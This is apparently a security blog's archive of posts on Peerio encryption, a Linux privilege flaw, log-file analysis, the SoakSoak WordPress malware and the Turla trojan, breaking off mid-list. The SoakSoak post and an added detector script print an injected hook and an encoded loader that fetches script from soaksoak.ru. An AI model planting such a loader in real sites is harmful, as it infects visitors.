Peerio Promises Encryption for Masses

Open Source, Security | Mar 02, 2015

Average computer users are in a terrified state today.

Trapped between the Scylla of anonymous hackers from around the world and the Charybdis of government spy agencies, countless computer users have abandoned all hope in the privacy and security of their computer messages and files.

The precarious situation would seem ripe for an explosion in the use of encryption, right?

And yet encryption has failed to take off in a noticeable way.

Only a tiny fraction of computer users (probably 0.000001%) leverage strong encryption for their messages and file storage.

The only reason encryption has not become ubiquitous in an increasingly dangerous world is that it’s impossibly hard for average Joes to use.

The mere mention of private keys and public keys has average computer users scurrying for cover.

That’s why the venerable PGP encryption has never taken off beyond a small group.

Enter a Montreal startup called Peerio Technologies with an ambitious open source project to make encryption technology “as easy as e-mail” for cloud storage and messaging.

Peerio builds off the miniLock encryption technology developed by the startup’s lead software engineer and security expert Nadim Kobeissi.

Peerio Technology

Combining cloud storage with messaging, Peerio promises end-to-end encryption that will ensure messages and files are encrypted before leaving your computer and can be read only by you and the intended recipients.

Peerio simplifies key management by leveraging passphrases instead of passwords. The service lets users pick a username that can be made public, and then Peerio suggests a secure passphrase from which the private keys are generated locally. Apparently, the keys are never sent to the Peerio server, and the key is discarded when the app is closed.

Having Peerio provide the passphrase seems like a terrible idea to me from a privacy and security perspective.

But the company defends its decision, stating that users sometimes forget their passphrases and, further, that it could not be certain they were picking secure passphrases.

Peerio’s developers attempt to allay concerns by saying they’re working on a ‘complex feature’ that will allow users to revoke previous passphrases and set up new ones. This ‘complex feature’ is supposedly in the works and will be ready soon.

As a second line of defense, Peerio offers two-factor authentication. So even if a passphrase is compromised, an attacker would still need the user’s mobile device to gain access to the account.

Other Peerio features include remote file destruction, real-time delivery notification and swift and secure transfer of large files.

As an open-source project, Peerio is publishing its code publicly and asking programmers and security experts to review and test its security.

Currently in “beta”, Peerio is now available for Windows and Mac computers and Google’s Chrome browser.

Visit GitHub to review Peerio’s code.

Mobile Support

Peerio intends to extend support for mobile devices in the near future.

Once the Peerio technology is available for iPhone, Android, Windows Phone and BlackBerry, users should be able to sync their data across all their devices.

The Android and iOS beta should be ready at the latest by early April.

Version 1.0.4.1 of Peerio debuted March 2, 2015 with improvements to the user interface, changes to signup and bug fixes.

Peerio plans to make money by offering paid plans for both individuals and groups once its encryption technology is stable.

If you’re keen on test driving Peerio’s beta, you can download the software from its web site.

Deadly Linux Vulnerability Uncovered

Linux, Security | Dec 16, 2014

A security alert by cloud and security services provider Alert Logic warns of a dangerous vulnerability in the Linux authorization system that allows unauthorized users to escalate privileges through the “wheel” group.

Wheel is a special user group that controls access to the su command, and thereby to superuser privileges.

The vulnerability permits unauthorized users to get root access, which in essence means gaining control of the entire system to do whatever malicious actions they want to.

Named “Grinch” (after Dr. Seuss’ unsavory fictional character), the vulnerability is considered serious because of Linux’s prevalence in e-commerce deployments.

Surveys have found that Linux/Unix powers 65% of web servers.

The vulnerability is said to span all Linux distros including mobile platforms like Android that are based on Linux.

Although no patch is available yet, recommendations to avoid the exploit being triggered include studying logs to monitor user actions on the system and avoiding installation tools like PKCon (the PackageKit Console Client). It is safer to stick with installation tools like Yum or dnf.

According to Alert Logic’s Chief Security Evangelist Stephen Coty, the fix for the vulnerability lies in managing PolKit authorization rules or properly managing group privileges for users.

Red Hat, the maintainer of PolKit, is said to have opened a ‘trouble ticket’ to examine the vulnerability.

Related Content
Stephen Coty Blog Post

Who’s Attacking Your Web Site – Study Log Files

Security | Dec 15, 2014

The world has gone to the dogs in the online arena.

The attacks are increasing and they’re coming fast and furious from Turkey, India, Iran, Romania, Thailand, France, China, Ukraine, Russia, US, Canada and all over the globe.

Both private hackers and government agencies are on the rampage.

You cannot stop all of the attacks but with some effort you can prevent a lot of them before they inflict catastrophic damage on your web site or network.

Log File Analysis

Studying log files on your Linux server is a good way to spot suspicious activity early and stop attacks before they start or get out of hand.

In this post, we will examine the different log files that can help identify malicious or potentially bad actors, based mostly on IP addresses.

As always in tackling web security, there’ll be some false positives, but that’s the price you pay for security.

Not every visitor from Ukraine, Iran, France, the UK or Turkey, nor every Amazon Web Services IP address, is a bad element.

Types of Log Files

Linux systems log everything that happens on the server and store the activity in various files under the /var/log and /var/log/httpd folders.

From a security perspective, the following logs (on a CentOS server) are of interest to us.

1) vsftpd.log – stores all FTP login attempts (including failed attempts) to your server
2) maillog – includes all e-mail sent and received by various users on your server, connections to the mail server and postfix/smtpd login failures
3) messages – records events such as relaying attempts, DDoS attacks (mod_evasive actions), SMTP attacks, fail2ban actions and invalid smtp saslauthd logins
4) access_log – saved in the /var/log/httpd folder, tells the story of who accessed your server, including various bots and their IP addresses
5) error_log – located in the /var/log/httpd folder, provides useful information about errors generated on your web server

Now, how do we access these various log files?

You can access the log files either through the command line or via GUI panels like Webmin.

Command Line

From the command line you can identify malicious visitors or potential attackers by running the netstat or ss commands.

While these are extremely useful, they have some limitations: they will not tell you clearly who did what a few hours back, yesterday or two days ago on your web site.

Also, you may have to run the netstat command multiple times with different options to figure out the attacking IP.

It is here that analyzing log files directly comes in handy.

Log files can be analyzed in two ways:

1) With the command less
2) Using tailf

The less command lets you examine the log files retained on disk, typically four or five days’ worth.

tailf, by contrast, allows you to monitor log files live as they are being generated.

less

To access log files on your Linux system, you have to first log in as root or superuser.

Once you are in the log folder, you can read the log files with the less command.

[root@christyserver]# cd /var/log
[root@christyserver log]# less vsftpd.log

When the log file opens on the command line, it starts at the beginning of the file. The file may contain logs for three or four days.

The beginning of the log file contains logs for older dates. This is because when the logs are saved, the newest entries are appended at the end of existing log file entries.

You can use various options to navigate the log file opened through less.
a) Page Up or b – Scroll back one page
b) Page Down or press space bar – scroll forward one page
c) Up arrow – scroll up one line
d) Down arrow – scroll down one line
e) G – Move to the end of the text file
f) 1G or g – move to the beginning of the text file
g) /characters – search forward to the next occurrence of characters
h) n – search for the next occurrence of the previous search
i) h – display help screen for less
j) q – quit less

Here’s an example of useful stuff gleaned from the less command:

[root@christyserver httpd]#  less access_log
58.96.168.215 - - [15/Dec/2014:18:55:14 -0500] "GET /ghgh/ghg/gh.php HTTP/1.1" 301 329 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:14 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 342 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:15 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 301 335 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:15 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 339 "-" "-"

In the above example, a bad element from Hong Kong is trying to play mischief with my PHP setup. So our next step ought to be to drop this IP and prevent it from accessing the server again.
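The same triage done programmatically, as an added example that is not part of the original post: it parses access_log lines in the Apache combined format, flags requests for the setup-file paths the scanner above probed (plus any .php request that returned 404), counts them per client IP and emits iptables DROP rules for IPs over a threshold. The sample log lines are constructed for the example using documentation-range IP addresses, and the probe path list is an assumption you should extend from your own logs.

```python
import re
from collections import Counter

# Apache combined/common log format, as written to /var/log/httpd/access_log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Paths legitimate visitors never request but setup-file scanners probe
# (assumed list, seeded from the phpMyAdmin probes shown above).
PROBE_MARKERS = ("/scripts/setup.php", "/phpmyadmin", "/pma/", "/myadmin/")

# Constructed sample: one scanner, one normal visitor, one single stray probe.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Dec/2014:18:55:14 -0500] "GET /ghgh/ghg/gh.php HTTP/1.1" 404 329 "-" "-"
203.0.113.7 - - [15/Dec/2014:18:55:14 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 342 "-" "-"
203.0.113.7 - - [15/Dec/2014:18:55:15 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 301 335 "-" "-"
203.0.113.7 - - [15/Dec/2014:18:55:15 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 339 "-" "-"
198.51.100.4 - - [15/Dec/2014:19:01:02 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [15/Dec/2014:19:01:03 -0500] "GET /about/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [15/Dec/2014:19:05:00 -0500] "GET /wp-login.php HTTP/1.1" 404 210 "-" "-"
""".splitlines()

def parse_line(line):
    """Return the fields of one access_log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry

def is_probe(entry):
    """True for a known scanner path, or for a .php request that hit nothing (404)."""
    path = entry["path"].lower()
    if any(marker in path for marker in PROBE_MARKERS):
        return True
    return path.endswith(".php") and entry["status"] == 404

def suspicious_ips(lines, threshold=3):
    """Count probe requests per client IP; return {ip: count} for IPs at or above threshold."""
    hits = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry and is_probe(entry):
            hits[entry["ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

def drop_rules(ips):
    """Render the iptables commands an admin would run to drop the flagged IPs."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(ips)]

if __name__ == "__main__":
    flagged = suspicious_ips(SAMPLE_LOG)
    for ip, count in flagged.items():
        print(f"{ip}: {count} probe requests")
    print("\n".join(drop_rules(flagged)))
```

Run it against the real file with `suspicious_ips(open("/var/log/httpd/access_log"))` and review the flagged IPs before applying any DROP rule, since a misconfigured crawler can trip the same pattern.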

SoakSoak Malware Wreaks Havoc on WordPress Sites

Security | Dec 15, 2014

Sorry folks, it’s not just big corporations like Staples, Sony, Target etc. that are being attacked by rogue elements.

Several hundred thousand WordPress sites, including presumably many belonging to average Joes, have been infected with JavaScript malware seeded by SoakSoak.ru, according to security services provider Sucuri.

The malware causes malicious software to be downloaded to a visitor’s computer.

WordPress is used by individuals, small businesses (restaurants, publishers, contractors etc) and non-profits to run blogs and web sites.

The attack from SoakSoak.ru is said to have prompted Google to blacklist over 11,000 domains. Being blacklisted by Google is often a kiss of death to a small business or non-profit.

SoakSoak Malware

Sucuri’s preliminary analysis shows correlation between the new malware and the Revslider vulnerability incidents from September 2014.

The SoakSoak malware modifies the file wp-includes/template-loader.php and includes the following content:

function FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This causes wp-includes/js/swfobject.js to be loaded on every page of the site, and that file contains the following malware:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Security experts have found that, once decoded, this snippet loads further JavaScript malware from the SoakSoak.ru domain, specifically this file: hxxp://soaksoak.ru/xteas/code

Currently, the best fix for the SoakSoak malware is to replace the infected files with clean copies or ideally with a fresh WordPress install.

You can check whether your favorite WordPress site has malware by using Sucuri’s free scanner.
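A small offline checker for the two indicators described above, added here as an example and not taken from Sucuri or the WordPress project: it looks for the injected wp_enqueue_scripts hook in template-loader.php, pulls the percent-encoded payload out of any eval(decodeURIComponent(...)) wrapper in swfobject.js, and decodes it for inspection (it is never executed) so the analyst can see which host the script loads from. The PHP and JavaScript samples are constructed for the example; the JavaScript one is built with quote() so that it is a valid encoded payload.

```python
import re
from urllib.parse import quote, unquote

# Indicator 1: the enqueue hook SoakSoak injects into wp-includes/template-loader.php.
PHP_HOOK_RE = re.compile(
    r"add_action\(\s*['\"]wp_enqueue_scripts['\"]\s*,\s*['\"]FuncQueueObject['\"]\s*\)")
# Indicator 2: an eval(decodeURIComponent("...")) wrapper around a percent-encoded string.
EVAL_RE = re.compile(
    r"eval\s*\(\s*decodeURIComponent\s*\(\s*['\"]([^'\"]+)['\"]\s*\)\s*\)")

# Constructed samples: the hook as quoted above, and an encoded loader built with quote().
SAMPLE_PHP = """<?php
function FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
"""
INJECTED_JS = ("(function(){var s=document.createElement('script');"
               "s.src='http://soaksoak.ru/xteas/code';document.head.appendChild(s);}());")
SAMPLE_JS = 'eval(decodeURIComponent("' + quote(INJECTED_JS, safe="") + '"));'

def find_injected_hook(php_source):
    """True if template-loader.php carries the SoakSoak enqueue hook."""
    return bool(PHP_HOOK_RE.search(php_source))

def extract_encoded_payloads(js_source):
    """Return every percent-encoded string passed to eval(decodeURIComponent(...))."""
    return EVAL_RE.findall(js_source)

def decode_payload(encoded):
    """Decode a payload for reading only; nothing here evaluates it."""
    return unquote(encoded)

def referenced_hosts(decoded_js):
    """Hostnames the decoded script references, so the analyst sees where it loads from."""
    return sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", decoded_js)))

def scan(php_source, js_source):
    """Summarise both indicators for one site: hook present, eval wrappers, remote hosts."""
    payloads = extract_encoded_payloads(js_source)
    hosts = {h for p in payloads for h in referenced_hosts(decode_payload(p))}
    return {"hook_injected": find_injected_hook(php_source),
            "eval_wrappers": len(payloads), "hosts": sorted(hosts)}

if __name__ == "__main__":
    # On a real site, read wp-includes/template-loader.php and wp-includes/js/swfobject.js.
    print(scan(SAMPLE_PHP, SAMPLE_JS))
```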

Even Netstat Can’t Find Turla Linux Trojan

Linux, Security | Dec 09, 2014

Until this morning, like countless others I too labored under the blissful illusion that Netstat was the panacea for all my Linux security concerns.

Alas, that feeling of comfort has disappeared since the discovery of an extremely stealthy Netstat-defying Turla Linux trojan.

The dangers of the Linux Turla trojan, which include hidden network communications, arbitrary remote command execution and remote management, should send a shiver up the spines of server administrators.

The Turla trojan was previously known to attack Windows-based computers only, via a hard-to-detect rootkit.

Turla Strikes Penguin

Security experts describe the Linux Turla trojan as a C/C++ executable statically linked against multiple libraries.

It seems much of the trojan’s code is based on public sources, combined with some functionality added by the attackers.

Early analysis of this Linux trojan suggests that the Turla cd00r-based malware maintains stealth without needing elevated privileges while running arbitrary remote commands.

To the great distress of Linux system administrators, the trojan can’t be discovered via the popular command line Netstat tool that displays network connections for TCP (incoming and outgoing).

The folks at Kaspersky Lab say the trojan uses techniques that don’t require root access. This means it can run more freely on more victim hosts.

Apparently, even if a regular user with limited privileges launches it, the Turla Linux trojan can continue to intercept incoming packets and run incoming commands on the system.

Turla Linux – Key Features

Executable Characteristics

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped

Statically Linked Libraries
glibc 2.3.2 – the GNU C library
openssl v0.9.6 – an older OpenSSL library
libpcap – tcpdump’s network capture library

Command & Control
Hardcoded C&C, known Turla activity: news-bbc.podzone.org
The domain has the following pDNS IP: 80.248.65.183

Expansion of Knowledge Economy Portends Cyber Attack Tsunami

Security | Nov 20, 2014

For all those lamenting the current wave of online attacks, I have bad news for you: the worst is still to come.

From the White House to Target to the U.S. State Department to Home Depot to the USPS and countless other organizations, it seems there’s not a single large outfit that hasn’t suffered a devastating online attack and the theft of credit card information and personal data of millions.

Ask not which large organization has been hacked, instead ask who’s not.

It’s not just businesses that are vulnerable to online attacks. Countless people fall victim daily to diverse forms of malware attacks on their desktop and laptop computers.

A couple of years back, a Google Search Results Hijack malware destroyed one of my Windows PCs.

Ransomware demands to unlock computers have escalated in recent months.

The world is full of nutcases determined to make life miserable for others.

And there’s nothing we can do about it considering there are far too many cyber-attack vectors (active attacks, passive attacks like search engine results and drive-by attacks when you visit an innocent-looking web site etc).

The fundamental weaknesses of the Internet architecture and the availability of countless IP addresses make it impossible to control the wave of attacks. You can sit in a Kiev or New Delhi basement and mount an anonymous attack on a NYC bank with impunity, a feat unimaginable in the physical world.

Even if you block 20, 200 or 2,000 IP addresses via hardware firewalls or IP Tables, hackers still have access to tens of thousands of other IPs from which to crash your web site, attack the server or plant malware in the network.

Each time you block an IP, CIDR or even an entire nation from accessing your network, the cyber-terrorist has no worries. None at all. Because he still has recourse to thousands of other IPs from which to reload and relaunch his attack on your point-of-sale system, server, web site or network.

But the current wave of attacks is just the harbinger of worse things to come over the next decade, more so with the inroads that information technology has made into all walks of life (hospitals, electric grids, transportation hubs, schools, air-traffic control, electronic voting etc).

Mark my words!

You’ll look back nostalgically to the present times as the halcyon days of the Internet.

Knowledge Economy -> Cyber Attacks

Until fairly recently, the knowledge economy was the exclusive preserve of U.S., Canada, UK, Germany, France, Japan, South Korea, Russia, Australia, New Zealand and a handful of other countries.

A knowledge economy is not merely one that has a high degree of literacy but one where a wide swathe of people leverage computers and information technology as powerful tools to forge ahead in education, entertainment, business, espionage and war.

By putting knowledge on steroids, information technology has created the knowledge economy.

Thanks to U.S. government funding of research labs (1945-75) and the entrepreneurial itch of Silicon Valley pioneers (1968-2014), the knowledge economy first flowered in the U.S., then moved east to Europe and now reached the shores of a few Third World nations.

For a variety of reasons (falling prices of computers, low-cost school/university education, economic growth etc), the knowledge economy is now starting to establish roots in ambitious nations like China, India, Brazil and Turkey, all with large populations.

Expansion of the knowledge economy to new nations has been accompanied by a massive surge in adoption of open source software like Linux in these nations. I suspect Kali Linux and Ubuntu have more users in China, Russia, India, Ukraine and Turkey than in the rest of the world combined.

As the knowledge economy reaches new geographical frontiers, expect the law of unintended consequences to come into play.

I predict there will be a tremendous surge in cyber attacks on all organizations (small, medium and large) for seven reasons:

* Expansion of the knowledge economy to new nations (like China, India, Iran, Brazil, Turkey etc) providing citizens access to basic infrastructure

* Growth of the open source software movement and easy availability of scores of free tools for port scanning, vulnerability scanning and exploiting servers and networks

* Increasing gap between the people entering the knowledge economy and the economic opportunities available to them